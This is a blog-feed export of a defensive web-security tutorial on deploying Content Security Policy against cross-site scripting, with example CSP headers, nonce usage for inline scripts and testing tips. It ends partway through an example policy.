tag:blogger.com,1999:blog-19821305726768961502024-03-19T12:57:23.925-07:00Prajal Kulkarni | Web SecurityA blog on Web and Network Security.Prajal Kulkarnihttp://www.blogger.com/profile/13944936185414563638noreply@blogger.comBlogger14125tag:blogger.com,1999:blog-1982130572676896150.post-56166211072989365332016-05-08T02:24:00.000-07:002016-05-08T23:19:21.325-07:00Implementing Content Security Policy. The Fortress of Cross Site Scripting #CSP #XSS<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="margin-bottom: 6pt; margin-top: 10pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="line-height: 1.38;">Content Security Policy is turning out to be one of the solutions at "scale" for fixing cross site scripting. In this blog I have tried condensing data from </span><span style="color: #cc0000; line-height: 1.38;">multiple sources from the internet</span><span style="line-height: 1.38;"> to focus on the important things one need to know to implement CSP for the first time. The idea of this blog post is to help security engineers who want to figure out where to start on CSP if they are in the process of implementing one on their production </span><span style="line-height: 22.08px;">environments</span><span style="line-height: 1.38;">.</span></span></div>
<div style="text-align: left;">
<span style="color: #38761d; font-family: "verdana" , sans-serif; line-height: 1.38; white-space: pre-wrap;">Introducing Content Security Policy:</span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware.</span></span></div>
<div style="text-align: justify;">
<b id="docs-internal-guid-830d0a41-8f83-0043-f8a5-06008cb8f6da" style="font-weight: normal;"><span style="font-family: "verdana" , sans-serif;"><br /></span></b></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The web’s security model is rooted in the </span><a href="http://en.wikipedia.org/wiki/Same_origin_policy" style="text-decoration: none;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">same origin policy</span></a><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, code from </span><span style="background-color: transparent; color: #e06666; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">https://mybank.com</span><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">should only have access to </span><span style="background-color: transparent; color: #e06666; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">https://mybank.com’s</span><span style="background-color: transparent; color: #e06666; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">data, and </span><span style="background-color: transparent; color: #e06666; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">https://evil.example.com</span><span style="background-color: transparent; color: #e06666; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">should certainly never be allowed access. Each origin is kept isolated from the rest of the web, giving developers a safe sandbox in which to build and play. In theory, this is perfectly brilliant. In practice, attackers have found clever ways to subvert the system</span></span></div>
<div style="text-align: justify;">
<b style="font-weight: normal;"><span style="font-family: "verdana" , sans-serif;"><br /></span></b></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">CSP is designed to be fully backward compatible; browsers that don't support it still work with servers that implement it, and vice-versa. Browsers that don't support CSP simply ignore it, functioning as usual, defaulting to the standard same-origin policy for web content. If the site doesn't offer the CSP header, browsers likewise use the standard </span><a href="https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy" style="text-decoration: none;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">same-origin policy</span></a></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><a href="http://caniuse.com/#feat=contentsecuritypolicy" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Here</span></a><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> is the list of browsers that support CSP.</span></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="color: #38761d; font-family: "verdana" , sans-serif; line-height: 1.38; white-space: pre-wrap;"><br /></span>
<span style="color: #38761d; font-family: "verdana" , sans-serif; line-height: 1.38; white-space: pre-wrap;">Pre-Requisites:</span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">Before jumping on to the implementation part, It is recommended you go through the W3C CSP recommendations and also few other links I think can be helpful for easy implementation:</span></span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<li style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<a href="http://www.w3.org/TR/CSP2/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">http://www.w3.org/TR/CSP2/</span></span></a></div>
</li>
<li style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<a href="http://www.cspplayground.com/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">http://www.cspplayground.com/</span></span></a></div>
</li>
<li style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #1155cc; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;"><a href="https://developer.mozilla.org/en-US/docs/Web/Security/CSP/Introducing_Content_Security_Policy" style="text-decoration: none;">https://developer.mozilla.org/en-US/docs/Web/Security/CSP/Introducing_Content_Security_Policy</a></span></span></div>
</li>
</ul>
<div style="text-align: left;">
<span style="color: #38761d; font-family: "verdana" , sans-serif; line-height: 1.38; text-align: justify; white-space: pre-wrap;"><br /></span></div>
<div style="text-align: left;">
<span style="color: #38761d; font-family: "verdana" , sans-serif; line-height: 1.38; text-align: justify; white-space: pre-wrap;">Pre-production Testing:</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<li style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Before implementing CSP on the production server, I recommended to use </span><a href="https://chrome.google.com/webstore/detail/csp-tester/ehmipebdmhlmikaopdfoinmcjhhfadlf?hl=en" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">CSP tester</span></a><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> chrome plugin to test the effects and to identify correct directives to be used as per your need.</span></span></div>
</li>
<li style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">This plugin simulates the behaviour of an actual CSP header sent in the response.</span></span></div>
</li>
</ul>
<div style="text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 14.6667px; font-style: normal; font-variant: normal; font-weight: 400; margin-left: 1em; margin-right: 1em; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img alt="Screen Shot 2015-10-05 at 4.19.10 pm.png" height="351" src="https://lh3.googleusercontent.com/Rmmv7a_plno2VkGFqiI86GXPKFW8mWhsAPC8lY_d_AOEo-pT81j9xaW2AqAaAl7JG_ANSoIyDUuaRS8vwoZgTEdC66ObXrh9gn7kwR4aRK0XOUBYg0LsHo3onpp1Sbu7DnOqqKb3" style="border: none; transform: rotate(0rad);" width="649" /></span></div>
</div>
<div style="text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<li style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">CSP tester plugin + Console Errors are the best way one can debug the error messages which occur by adding CSP header.</span></span></div>
</li>
</ul>
<div style="text-align: justify;">
<b style="font-weight: normal;"><span style="font-family: "verdana" , sans-serif;"><br /></span></b></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "verdana" , sans-serif; margin-left: 1em; margin-right: 1em;"><img alt="Screen Shot 2015-10-05 at 4.19.50 pm.png" height="161" src="https://lh5.googleusercontent.com/sn3Yg3xGzD0VMvVwRlfzSdHdkOHfXv2vOS5f1EIBMLO38rlXMOsRazKBdNZA4U72uMN8Ks24Rw7GuBw-KSPIiq33zqDggzZ_OGzoQHSIJtJch5oRPKF9uJXiHl_XW0o6Z-p7NvLE" style="border: none; transform: rotate(0rad);" width="644" /></span></div>
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span><br />
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;"><span style="color: #38761d; line-height: 1.38;"><br /></span></span></span>
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;"><span style="color: #38761d; line-height: 1.38;">Secure way of Implementing CSP:</span></span></span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<li style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">There are multiple ways to implement CSP. Just by whitelisting javascript source files, one does not end up securing the application from XSS. Developers normally implement CSP in a way which makes their work easier leaving the application still vulnerable to XSS. </span></span></div>
</li>
</ul>
<span style="color: #38761d; font-family: "verdana" , sans-serif; line-height: 1.38; white-space: pre-wrap;"></span><br />
<div le="text-align: justify;" sty="">
<span style="color: #38761d; font-family: "verdana" , sans-serif; line-height: 1.38; white-space: pre-wrap;"><span style="line-height: 1.38;">CSP Directives:</span></span></div>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none; text-align: justify; width: 624px;"><colgroup><col width="*"></col></colgroup><tbody>
<tr style="height: 40px;"><td style="background-color: #d9d9d9; border-bottom: solid #434343 1px; border-left: solid #434343 1px; border-right: solid #434343 1px; border-top: solid #434343 1px; padding: 7px 7px 7px 7px; vertical-align: top;"><div dir="ltr" style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #444444; color: #e28964; font-family: "verdana"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Content-Security-Policy: </span><span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">default-src</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: #444444; color: #65b042; font-family: "verdana"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'none’</span></div>
</td></tr>
</tbody></table>
</div>
<div style="text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">The first step to start a CSP header is to specify which is the default source list. A better practise to implement this is to call it ‘none’, which will encourage us to whitelist all the sources we have.</span></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Few sources to be considered </span><span style="background-color: transparent; color: #6aa84f; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">[script,style,connect,object,img,child]</span></span></div>
<div style="text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none; text-align: justify; width: 624px;"><colgroup><col width="*"></col></colgroup><tbody>
<tr style="height: 40px;"><td style="background-color: #d9d9d9; border-bottom: solid #434343 1px; border-left: solid #434343 1px; border-right: solid #434343 1px; border-top: solid #434343 1px; padding: 7px 7px 7px 7px; vertical-align: top;"><div dir="ltr" style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #444444; color: #e28964; font-family: "verdana"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Content-Security-Policy: </span><span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">script-src</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: #444444; color: #65b042; font-family: "verdana"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'self'</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-size: 15.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> https://img1a.flixcart.com; https://img1a.flixcart.com</span></div>
</td></tr>
</tbody></table>
</div>
<div style="text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">W</span><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">hitelist all the script origins as shown in above example and make sure we do not add ‘unsafe-inline’ to the script-src directive. If we allow inline javascript to run than it could defeat the purpose of CSP. </span></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">With unsafe-inline we allow inline JS to execute in our application, which means if the application is vulnerable to XSS, an attacker will still be able to execute JS in the context of our application.</span></span><br />
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;"><br /></span></span></div>
<div style="text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="color: #38761d; line-height: 1.38; white-space: pre-wrap;">Handling Inline JS:</span></span></div>
<div style="text-align: left;">
<span style="font-family: "verdana" , sans-serif;">
</span>
</div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">If we have inline javascript which requires to execute then we need to specify a random </span><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">nonce</span><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> in the header. We have to generate this nonce at the server end and send it across in the CSP header and consume the same in our inline Javascripts.</span></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">To use a nonce, give your script tag a nonce attribute. Its value must match one in the list of trusted sources. </span></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">Example:</span></span><br />
<span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;"><br /></span></span></div>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none; text-align: justify; width: 624px;"><colgroup><col width="*"></col></colgroup><tbody>
<tr style="height: 40px;"><td style="background-color: #d9d9d9; border-bottom: solid #434343 1px; border-left: solid #434343 1px; border-right: solid #434343 1px; border-top: solid #434343 1px; padding: 7px 7px 7px 7px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #444444; color: #e28964; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Content-Security-Policy: </span><span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">script-src</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: #444444; color: #65b042; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'nonce-EDNnf03nceIOfn39fn3e9h3sdfa</span></div>
</td></tr>
</tbody></table>
</div>
<div style="text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none; text-align: justify; width: 624px;"><colgroup><col width="*"></col></colgroup><tbody>
<tr style="height: 40px;"><td style="background-color: #d9d9d9; border-bottom: solid #434343 1px; border-left: solid #434343 1px; border-right: solid #434343 1px; border-top: solid #434343 1px; padding: 7px 7px 7px 7px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><script</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: #444444; color: darkkhaki; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">nonce</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">=</span><span style="background-color: #444444; color: #65b042; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">EDNnf03nceIOfn39fn3e9h3sdfa</span><span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">></span><span style="background-color: #444444; color: white; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span><span style="background-color: #444444; color: white; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: #444444; color: #aeaeae; font-family: "verdana"; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">//Some inline code I cant remove yet, but need to asap.</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br class="kix-line-break" /></span><span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></script></span></div>
</td></tr>
</tbody></table>
</div>
<div style="text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: #38761d; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "verdana" , sans-serif;">Example Policy:</span></span></div>
<div style="text-align: justify;">
<b style="font-weight: normal;"><br /></b></div>
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none; text-align: justify;"><colgroup><col width="621"></col></colgroup><tbody>
<tr style="height: 40px;"><td style="background-color: #d9d9d9; border-bottom: solid #434343 1px; border-left: solid #434343 1px; border-right: solid #434343 1px; border-top: solid #434343 1px; padding: 7px 7px 7px 7px; vertical-align: top;"><div dir="ltr" style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #444444; color: #e28964; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Content-Security-Policy: </span></div>
<div dir="ltr" style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">default-src</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: #444444; color: #65b042; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'none'</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">; </span><span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">script-src</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: #444444; color: #65b042; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'nonce-EDNnf03nceIOfn39fn3e9h3sdfa </span><span style="background-color: #444444; color: white; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">http://img1a.flixcart.com http://img2a.flixcart.com https://www.google-analytics.com https://s3.amazonaws.com;</span></div>
<div dir="ltr" style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">style-src</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> https://img1a.flixcart.com ‘unsafe-inline’ ‘unsafe-eval’; </span><span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">img-src</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> https://img1a.flixcart.com; </span></div>
<div dir="ltr" style="line-height: 1.56; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">connect-src</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> https://api.mybank.com; </span><span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">child-src</span><span style="background-color: #444444; color: white; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: #444444; color: #65b042; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'self'; </span><span style="background-color: #444444; color: #89bdff; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">font-src </span><span style="background-color: #444444; color: #65b042; font-family: "verdana"; font-size: 13.333333333333332px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">'self' *</span></div>
